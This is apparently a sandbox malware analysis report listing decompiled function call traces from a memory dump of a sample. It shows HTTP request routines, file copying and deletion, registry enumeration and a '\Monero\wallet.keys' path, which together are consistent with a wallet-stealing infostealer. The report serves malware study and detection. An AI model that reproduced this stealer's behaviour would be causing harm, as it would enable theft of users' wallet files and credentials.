Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0120F420,00000000,?,01209E58,00000000,?,00971980,00000000,?,00964CAF), ref: 00955787
lstrlen.KERNEL32(00000000), ref: 0095579B
GetProcessHeap.KERNEL32(00000000,?), ref: 009557AC
RtlAllocateHeap.NTDLL(00000000), ref: 009557B3
lstrlen.KERNEL32(00000000), ref: 009557C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009557F9
lstrlen.KERNEL32(00000000), ref: 00955818
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00955831
lstrlen.KERNEL32(00000000,?,?), ref: 0095585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00955872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0095589D
InternetCloseHandle.WININET(00000000), ref: 00955901
InternetCloseHandle.WININET(00000000), ref: 0095590E
InternetCloseHandle.WININET(00000000), ref: 00955918

Strings

", xrefs: 009554D2
------, xrefs: 0095568B
", xrefs: 00955756
--, xrefs: 009552D0
------, xrefs: 00955407
------, xrefs: 009552E7
", xrefs: 00955614
------, xrefs: 00955549

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 348bd58b4723adbeae79b3d8437f3e04b8c7f021711e6976336bc7d485c56963
Instruction ID: 481b1b505d5392015869c9a21213ed7aea04c225cf6f84330e8278eba2ea0258
Opcode Fuzzy Hash: 348bd58b4723adbeae79b3d8437f3e04b8c7f021711e6976336bc7d485c56963
Instruction Fuzzy Hash: 8432FE72920118ABDB14EBA0DCA5FEEB378BF95700F404199F50A73192EF716A48CF65

Function 009559B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0095483A
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954852
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954868
Part of subcall function 00954800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954889
Part of subcall function 00954800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954899

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00955A48
StrCmpCA.SHLWAPI(?,0120F340), ref: 00955A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00955BE3
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0120F470,00000000,?,01209E58,00000000,?,009719C0), ref: 00955EC1
lstrlen.KERNEL32(00000000), ref: 00955ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00955EE3
RtlAllocateHeap.NTDLL(00000000), ref: 00955EEA
lstrlen.KERNEL32(00000000), ref: 00955EFF
lstrlen.KERNEL32(00000000), ref: 00955F28
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00955F41
lstrlen.KERNEL32(00000000,?,?), ref: 00955F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00955F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00955F9C
InternetCloseHandle.WININET(00000000), ref: 00956000
InternetCloseHandle.WININET(00000000), ref: 0095600D
HttpOpenRequestA.WININET(00000000,0120F3F0,?,0120EE20,00000000,00000000,00400100,00000000), ref: 00955C48

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

InternetCloseHandle.WININET(00000000), ref: 00956017

Strings

", xrefs: 00955D25
------, xrefs: 00955AE6
", xrefs: 00955E66
------, xrefs: 00955C5B
------, xrefs: 00955D9C

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 40e8e8be48abde41c584fb49a434257e5932f652e971e4ac2cff73de362fb7be
Instruction ID: c8534412888bfed13c7d9ff2e39f43c53219ef20bf53bfd64b4dbdd9802fc845
Opcode Fuzzy Hash: 40e8e8be48abde41c584fb49a434257e5932f652e971e4ac2cff73de362fb7be
Instruction Fuzzy Hash: 0812DA72864118AACB15EBA0DCA6FEEB378BF94700F404199F50A73191EF716B48CF65

Function 0095A6C0 Relevance: 30.5, APIs: 20, Instructions: 495
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096A440: StrCmpCA.SHLWAPI(01208970,0095A6D7,?,0095A6D7,01208970), ref: 0096A45F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0095A9F2
RtlAllocateHeap.NTDLL(00000000), ref: 0095A9F9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095A7DA

Part of subcall function 0096A1F0: lstrlen.KERNEL32(00954F55,?,?,00954F55,00970DC6), ref: 0096A1FB
Part of subcall function 0096A1F0: lstrcpy.KERNEL32(00970DC6,00000000), ref: 0096A255

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

lstrcat.KERNEL32(?,00000000), ref: 0095AB3A
lstrcat.KERNEL32(?,009712C4), ref: 0095AB49
lstrcat.KERNEL32(?,00000000), ref: 0095AB5C
lstrcat.KERNEL32(?,009712C8), ref: 0095AB6B
lstrcat.KERNEL32(?,00000000), ref: 0095AB7E
lstrcat.KERNEL32(?,009712CC), ref: 0095AB8D
lstrcat.KERNEL32(?,00000000), ref: 0095ABA0
lstrcat.KERNEL32(?,009712D0), ref: 0095ABAF
lstrcat.KERNEL32(?,00000000), ref: 0095ABC2
lstrcat.KERNEL32(?,009712D4), ref: 0095ABD1
lstrcat.KERNEL32(?,00000000), ref: 0095ABE4
lstrcat.KERNEL32(?,009712D8), ref: 0095ABF3

Part of subcall function 00959E60: LocalAlloc.KERNEL32(00000040,?), ref: 00959EFE

lstrcat.KERNEL32(?,00000000), ref: 0095AC3C
lstrcat.KERNEL32(?,009712DC), ref: 0095AC56
lstrlen.KERNEL32(?), ref: 0095AC95
lstrlen.KERNEL32(?), ref: 0095ACA4

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

DeleteFileA.KERNEL32(00000000), ref: 0095AD1F

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeap$AllocAllocateCopyDeleteLocalProcess
String ID:
API String ID: 1656385275-0
Opcode ID: 601913a45bc5a2a27f4627b41d3dd0482f554ab8a909eff027289fa1fbb2cadd
Instruction ID: 43e40b83a3350ee6423714da9033b2cd38109b7f59f3686bb5e61f1ccffa1533
Opcode Fuzzy Hash: 601913a45bc5a2a27f4627b41d3dd0482f554ab8a909eff027289fa1fbb2cadd
Instruction Fuzzy Hash: 62021C72914108ABCB04EBA0DC96FEE7778AF94301F104159F50BB71A1EE75AE48CF66

Function 0095CD30 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00968600: GetSystemTime.KERNEL32(00970E02,01209C18,0097059E,?,?,009513F9,?,0000001A,00970E02,00000000,?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 00968626

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095CDC3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0095CF07
RtlAllocateHeap.NTDLL(00000000), ref: 0095CF0E
lstrcat.KERNEL32(?,00000000), ref: 0095D048
lstrcat.KERNEL32(?,0097141C), ref: 0095D057
lstrcat.KERNEL32(?,00000000), ref: 0095D06A
lstrcat.KERNEL32(?,00971420), ref: 0095D079
lstrcat.KERNEL32(?,00000000), ref: 0095D08C
lstrcat.KERNEL32(?,00971424), ref: 0095D09B
lstrcat.KERNEL32(?,00000000), ref: 0095D0AE
lstrcat.KERNEL32(?,00971428), ref: 0095D0BD
lstrcat.KERNEL32(?,00000000), ref: 0095D0D0
lstrcat.KERNEL32(?,0097142C), ref: 0095D0DF
lstrcat.KERNEL32(?,00000000), ref: 0095D0F2
lstrcat.KERNEL32(?,00971430), ref: 0095D101
lstrcat.KERNEL32(?,00000000), ref: 0095D114
lstrcat.KERNEL32(?,00971434), ref: 0095D123

Part of subcall function 0096A1F0: lstrlen.KERNEL32(00954F55,?,?,00954F55,00970DC6), ref: 0096A1FB
Part of subcall function 0096A1F0: lstrcpy.KERNEL32(00970DC6,00000000), ref: 0096A255

lstrlen.KERNEL32(?), ref: 0095D16A
lstrlen.KERNEL32(?), ref: 0095D179

Part of subcall function 0096A440: StrCmpCA.SHLWAPI(01208970,0095A6D7,?,0095A6D7,01208970), ref: 0096A45F

DeleteFileA.KERNEL32(00000000), ref: 0095D1F4

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 2b3b59c8792d50c2ebc92c560c2d9c496f14163ecf5ce4b3fd416c43da018cd9
Instruction ID: 5ac87d12195b42db2eda5f5c175db6eb4b65f55f6f606bc759f34b0be3eb5ec3
Opcode Fuzzy Hash: 2b3b59c8792d50c2ebc92c560c2d9c496f14163ecf5ce4b3fd416c43da018cd9
Instruction Fuzzy Hash: C7E11972914108ABCB04EBA0DC96FEE7778AF94305F104159F50BB71A1EE71AE48CF66

Function 00967DC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

RegOpenKeyExA.KERNEL32(00000000,0120ACC0,00000000,00020019,00000000,009705A6), ref: 00967E44
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00967EC6
wsprintfA.USER32 ref: 00967EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00967F1B
RegCloseKey.ADVAPI32(00000000), ref: 00967F2C
RegCloseKey.ADVAPI32(00000000), ref: 00967F39

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Strings

- , xrefs: 00968043
%s\%s, xrefs: 00967EED
?, xrefs: 00967E1A

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 308b30d6b2efdba20c79210a01717747fee6c741e2c84411ca4d419ff35eb693
Instruction ID: 72edd4558a287cac5a3e05aa03ed697b1f138a607beaae1a6da45b9e5dcaad24
Opcode Fuzzy Hash: 308b30d6b2efdba20c79210a01717747fee6c741e2c84411ca4d419ff35eb693
Instruction Fuzzy Hash: 2881FC7191511CABDB28DB54CC95FEAB7B8BF48704F0086D9E10AA6190DF71AF89CF90

Function 009562D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0095483A
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954852
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954868
Part of subcall function 00954800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954889
Part of subcall function 00954800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954899

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

InternetOpenA.WININET(00970DE6,00000001,00000000,00000000,00000000), ref: 00956331
StrCmpCA.SHLWAPI(?,0120F340), ref: 00956353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956385
HttpOpenRequestA.WININET(00000000,GET,?,0120EE20,00000000,00000000,00400100,00000000), ref: 009563D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0095640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00956421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0095644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009564BD
InternetCloseHandle.WININET(00000000), ref: 0095653F
InternetCloseHandle.WININET(00000000), ref: 00956549
InternetCloseHandle.WININET(00000000), ref: 00956553

Strings

ERROR, xrefs: 00956457
ERROR, xrefs: 00956519
GET, xrefs: 009563CC

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 53e616c2cc2a62c6c64eb4b4cfb673e4e0ab8eab4417c42906e9083514387d4c
Instruction ID: 231001b4ea8ef3b22cd4a83739b27d02b96a54da4f311005482e8ff4d5d6aa1f
Opcode Fuzzy Hash: 53e616c2cc2a62c6c64eb4b4cfb673e4e0ab8eab4417c42906e9083514387d4c
Instruction Fuzzy Hash: 1C716F71A00218EBDB24EFA0DC59FEEB778BB44701F508199F50A6B190DBB46E89CF51

